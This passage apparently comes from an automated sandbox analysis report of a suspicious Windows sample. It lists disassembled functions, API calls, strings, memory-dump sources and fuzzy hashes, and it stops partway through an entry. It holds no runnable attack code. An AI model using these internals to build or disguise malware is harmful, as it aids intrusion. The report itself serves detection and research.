                                                                                                                                    • Part of subcall function 008BAAC9: GetDC.USER32(00000000), ref: 008BAAD2
                                                                                                                                    • Part of subcall function 008BAAC9: GetObjectW.GDI32(?,00000018,?), ref: 008BAB01
                                                                                                                                    • Part of subcall function 008BAAC9: ReleaseDC.USER32(00000000,?), ref: 008BAB99
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectRelease$CapsDevice
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 1061551593-3887548279
                                                                                                                                  • Opcode ID: 65da578e377d1c68f07dad2fefb4f8fdda8a9e17e6ed7118abaae5b939a55437
                                                                                                                                  • Instruction ID: 67ab94779d7fe177f79a45977a7aa08ea6c1dc1267babbc2f0477ac1c97beb1a
                                                                                                                                  • Opcode Fuzzy Hash: 65da578e377d1c68f07dad2fefb4f8fdda8a9e17e6ed7118abaae5b939a55437
                                                                                                                                  • Instruction Fuzzy Hash: 8791EFB1608355AFD614DF25C844A6BBBF9FFC9701F00491EF99AD3220DB30A945CB62
                                                                                                                                  Function 008A75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A75E3
                                                                                                                                    • Part of subcall function 008B05DA: _wcslen.LIBCMT ref: 008B05E0
                                                                                                                                    • Part of subcall function 008AA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008AA598
                                                                                                                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008A777F
                                                                                                                                    • Part of subcall function 008AA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,008AA325,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA501
                                                                                                                                    • Part of subcall function 008AA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,008AA325,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA532
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 3226429890-336475711
                                                                                                                                  • Opcode ID: 66e646a734b93145984680e0a79cebcd128972f422078e738b72cfc99066c5e5
                                                                                                                                  • Instruction ID: a7aca7cda8b55efffabd894a91bb90dcc531f5ca7229a39d86d3b1125778138f
                                                                                                                                  • Opcode Fuzzy Hash: 66e646a734b93145984680e0a79cebcd128972f422078e738b72cfc99066c5e5
                                                                                                                                  • Instruction Fuzzy Hash: 5E419071804558A9FB35EB68CC56EEEB378FF52300F0040A6B605E2592DB745F84DF62
                                                                                                                                  Function 008BB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen
                                                                                                                                  • String ID: }
                                                                                                                                  • API String ID: 176396367-4239843852
                                                                                                                                  • Opcode ID: 8dc3802176a5bb7cc8098358d8f76312edc510c35e6343dc30495c19ed83386c
                                                                                                                                  • Instruction ID: b50cbce5f628ab313a40fcbd5b516a92ebd4c894dc14c97e3741416605e207d6
                                                                                                                                  • Opcode Fuzzy Hash: 8dc3802176a5bb7cc8098358d8f76312edc510c35e6343dc30495c19ed83386c
                                                                                                                                  • Instruction Fuzzy Hash: AB219D7290461A5AD731EA68D845FABB3ECFF91750F04042AF640C2342EBB5ED4883A3
                                                                                                                                  Function 008AF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008AF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 008AF2E4
                                                                                                                                    • Part of subcall function 008AF2C5: GetProcAddress.KERNEL32(008E81C8,CryptUnprotectMemory), ref: 008AF2F4
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,008AF33E), ref: 008AF3D2
                                                                                                                                  Strings
                                                                                                                                  • CryptUnprotectMemory failed, xrefs: 008AF3CA
                                                                                                                                  • CryptProtectMemory failed, xrefs: 008AF389
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$CurrentProcess
                                                                                                                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                  • API String ID: 2190909847-396321323
                                                                                                                                  • Opcode ID: 5a4cecd0ccafa923ffe5b86a060f4e22fd4b9fb3826ce5c33080e62c64633607
                                                                                                                                  • Instruction ID: dfbf8d35f05ac98805237e94d69e75b03b82e1fb040a61be94f9361c5e130bf6
                                                                                                                                  • Opcode Fuzzy Hash: 5a4cecd0ccafa923ffe5b86a060f4e22fd4b9fb3826ce5c33080e62c64633607
                                                                                                                                  • Instruction Fuzzy Hash: 4C115631A01629ABFF11AF74DC41A2E3754FF02760F04812AFE05DF792DA719D018B92
                                                                                                                                  Function 008AB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _swprintf.LIBCMT ref: 008AB9B8
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __vswprintf_c_l_swprintf
                                                                                                                                  • String ID: %c:\
                                                                                                                                  • API String ID: 1543624204-3142399695
                                                                                                                                  • Opcode ID: 2015a678b5194025af7ca3cda71da95f5c0d7b4e58d1e22c3b9ec6cc44dacc1e
                                                                                                                                  • Instruction ID: 8b1deb1f1359f364b501490de9e071dafb22c780a20b67681b844fb1d0bef5b0
                                                                                                                                  • Opcode Fuzzy Hash: 2015a678b5194025af7ca3cda71da95f5c0d7b4e58d1e22c3b9ec6cc44dacc1e
                                                                                                                                  • Instruction Fuzzy Hash: FD01C06350472169AA206A399C42E6BABA8FF93770B44851EF544D6983FB30E85082A2
                                                                                                                                  Function 008B101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(00000000,00010000,008B1160,?,00000000,00000000), ref: 008B1043
                                                                                                                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 008B108A
                                                                                                                                    • Part of subcall function 008A6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A6C54
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                  • String ID: CreateThread failed
                                                                                                                                  • API String ID: 2655393344-3849766595
                                                                                                                                  • Opcode ID: 576a438804ed66165581b7e115b2982755e2324b8027df905d0bdb8be6fe1c28
                                                                                                                                  • Instruction ID: a33907e61c14f3fbc6e55d8b8a653d624ca039239bcef829f24c30469d8b1ae6
                                                                                                                                  • Opcode Fuzzy Hash: 576a438804ed66165581b7e115b2982755e2324b8027df905d0bdb8be6fe1c28
                                                                                                                                  • Instruction Fuzzy Hash: D3012BB53007496BE730AF689C55FB6B368FB41350F10002EF646D6380CBB16C854221
                                                                                                                                  Function 008A1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008AE2E8: _swprintf.LIBCMT ref: 008AE30E
                                                                                                                                    • Part of subcall function 008AE2E8: _strlen.LIBCMT ref: 008AE32F
                                                                                                                                    • Part of subcall function 008AE2E8: SetDlgItemTextW.USER32(?,008DE274,?), ref: 008AE38F
                                                                                                                                    • Part of subcall function 008AE2E8: GetWindowRect.USER32(?,?), ref: 008AE3C9
                                                                                                                                    • Part of subcall function 008AE2E8: GetClientRect.USER32(?,?), ref: 008AE3D5
                                                                                                                                  • GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                  • SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2622349952-4108050209
                                                                                                                                  • Opcode ID: 141f19017f402a7dcf14842260e843285e6dc7b823bacc4ee8b15ef2e8f76ee8
                                                                                                                                  • Instruction ID: 66bcb82db4e74c93d7d80b03aa2a97a383c4994f9fdcf1bd81de561f9d83c812
                                                                                                                                  • Opcode Fuzzy Hash: 141f19017f402a7dcf14842260e843285e6dc7b823bacc4ee8b15ef2e8f76ee8
                                                                                                                                  • Instruction Fuzzy Hash: D1F04F3010928CAAEF151F658C0DBEA3B69FF46344F048614FD44D5EA1DB7CCA94EB50
                                                                                                                                  Function 008B0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,008B1206,?), ref: 008B0FEA
                                                                                                                                  • GetLastError.KERNEL32(?), ref: 008B0FF6
                                                                                                                                    • Part of subcall function 008A6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A6C54
                                                                                                                                  Strings
                                                                                                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 008B0FFF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                  • API String ID: 1091760877-2248577382
                                                                                                                                  • Opcode ID: 1e3a71beb0168c451535a2b4711bf2c85e92c648bf2c9f008be903ff07e557d6
                                                                                                                                  • Instruction ID: e1dbe7e790bdecd2928aef8fcd1da1f2cf72026b002107680a3571024c41072e
                                                                                                                                  • Opcode Fuzzy Hash: 1e3a71beb0168c451535a2b4711bf2c85e92c648bf2c9f008be903ff07e557d6
                                                                                                                                  • Instruction Fuzzy Hash: F0D02B3150492177DA1033285C09C6F7B04FB13331F540705F138E53E5CB240D915293
                                                                                                                                  Function 008AE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,008ADA55,?), ref: 008AE2A3
                                                                                                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,008ADA55,?), ref: 008AE2B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindHandleModuleResource
                                                                                                                                  • String ID: RTL
                                                                                                                                  • API String ID: 3537982541-834975271
                                                                                                                                  • Opcode ID: a1408d100168d70000980d4754639a2cd374daa8d5f528d57cdb0f510ead8012
                                                                                                                                  • Instruction ID: 20a21c5b7c668f90457cb3b10f81d303a6971c52cb8c70b0d75622700a58939c
                                                                                                                                  • Opcode Fuzzy Hash: a1408d100168d70000980d4754639a2cd374daa8d5f528d57cdb0f510ead8012
                                                                                                                                  • Instruction Fuzzy Hash: C2C01231241B1066E63027646C0DB436B98BB01B21F05055AB141EA2D1D6A5C94086A1

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:7.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:3
                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                  execution_graph 9581 7ffd9bebac12 9582 7ffd9bebbf60 QueryFullProcessImageNameA 9581->9582 9584 7ffd9bebc104 9582->9584

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FFD9BAC0D74 Relevance: .3, Instructions: 255COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8477991d3d50ca1a7ee8eb158848ae86885ab4cd31afb5a106a55b864e2796c4
                                                                                                                                  • Instruction ID: 2611d00911901433912c298bad22941be1111da7c2ea3d04f7506019599fa32a
                                                                                                                                  • Opcode Fuzzy Hash: 8477991d3d50ca1a7ee8eb158848ae86885ab4cd31afb5a106a55b864e2796c4
                                                                                                                                  • Instruction Fuzzy Hash: 0A91C272A58A4D8FE798EB6888797A97FE1FF59314F4002BEE049D72D6CB741405C740
                                                                                                                                  Function 00007FFD9BC21853 Relevance: 2.9, Strings: 1, Instructions: 1603COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1938702450.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bc20000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $
                                                                                                                                  • API String ID: 0-3993045852
                                                                                                                                  • Opcode ID: 2cc9bee185c2e016b357c8ad6f5bdab4352bf47b9faab179b21e0143d6508e81
                                                                                                                                  • Instruction ID: 284afa97eeb41bcba8b957d6f9270e7d9dce66a97cd4bcdca635406cdc0ea1ae
                                                                                                                                  • Opcode Fuzzy Hash: 2cc9bee185c2e016b357c8ad6f5bdab4352bf47b9faab179b21e0143d6508e81
                                                                                                                                  • Instruction Fuzzy Hash: 75D29371A1DA594FDB98EB58C8A5EA4B7E1FF68750F0442F9E04CD3292CA34BD84CB41
                                                                                                                                  Function 00007FFD9BEBAC12 Relevance: 1.7, APIs: 1, Instructions: 243COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1940847278.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9beb0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FullImageNameProcessQuery
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3578328331-0
                                                                                                                                  • Opcode ID: 84672be7ac1991af49d00b15fda6a137b54d37f0425b37f0f3ac6218067c5fc9
                                                                                                                                  • Instruction ID: 0ea4c84a083f728db3cd3f428c0d2c4f8a5d529fccfa56a005a34992ea9674b4
                                                                                                                                  • Opcode Fuzzy Hash: 84672be7ac1991af49d00b15fda6a137b54d37f0425b37f0f3ac6218067c5fc9
                                                                                                                                  • Instruction Fuzzy Hash: 2D717030618A4D8FEB68DF68C8557F937E1FB59311F10423EE84EC72A2CB75A9418B81
                                                                                                                                  Function 00007FFD9BAC08D0 Relevance: .2, Instructions: 176COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0875e0b24bb3c4db1d34180fc609a660243aa6c0dfe9b6765137bd3f49404978
                                                                                                                                  • Instruction ID: 4d89290963aed86ba35e0b8b1677ffb6da3be6553449e0fa6f2f7072e356457b
                                                                                                                                  • Opcode Fuzzy Hash: 0875e0b24bb3c4db1d34180fc609a660243aa6c0dfe9b6765137bd3f49404978
                                                                                                                                  • Instruction Fuzzy Hash: 86411812B0D5590AE328F7BC68766F97B81DF5933AB0442BBE44ECB1D7DD14A84182C4
                                                                                                                                  Function 00007FFD9BAC07D0 Relevance: .1, Instructions: 130COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a73dbb85ba26851dd0adcbf0a76d573420f0093cd334b75bb946ee7c266387bb
                                                                                                                                  • Instruction ID: 8ca37970e8047173199f857698bbe2456d01dafe066cdbe7cd966d6d11262a16
                                                                                                                                  • Opcode Fuzzy Hash: a73dbb85ba26851dd0adcbf0a76d573420f0093cd334b75bb946ee7c266387bb
                                                                                                                                  • Instruction Fuzzy Hash: 7D410621B0E68D4FE7A6AB7848296B93BE0EF96314F0641FBD049C71E7DD186A058381
                                                                                                                                  Function 00007FFD9BAC6DB6 Relevance: .1, Instructions: 118COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 56006d7b96cbefc267a1f564f684b67cbaa9fb2f0a9633a5cab2425d7ad775cf
                                                                                                                                  • Instruction ID: a2d77b4cf0114b9454277172d5345bfa07d0b174fb859dc8b5b75e6276423769
                                                                                                                                  • Opcode Fuzzy Hash: 56006d7b96cbefc267a1f564f684b67cbaa9fb2f0a9633a5cab2425d7ad775cf
                                                                                                                                  • Instruction Fuzzy Hash: C3316821B19D0D4FEBE8FB6CC0A9A7863D1EF98750B554176E00DC72B7DE68AD418740
                                                                                                                                  Function 00007FFD9BAC0C25 Relevance: .1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: aa4483d50704a60d1e6b7ee667e1553a8feac56b89e6dd420cdf853642e9d88c
                                                                                                                                  • Instruction ID: fcef2948de7ee2dcb418448a9001b5e708f96527216749cef92e53ecb1fe705a
                                                                                                                                  • Opcode Fuzzy Hash: aa4483d50704a60d1e6b7ee667e1553a8feac56b89e6dd420cdf853642e9d88c
                                                                                                                                  • Instruction Fuzzy Hash: 86314931B0E24D8AE335FBA888651FC7BA0EF52325F0542F7D0188B1D3D9782685C785
                                                                                                                                  Function 00007FFD9BAC0998 Relevance: .1, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
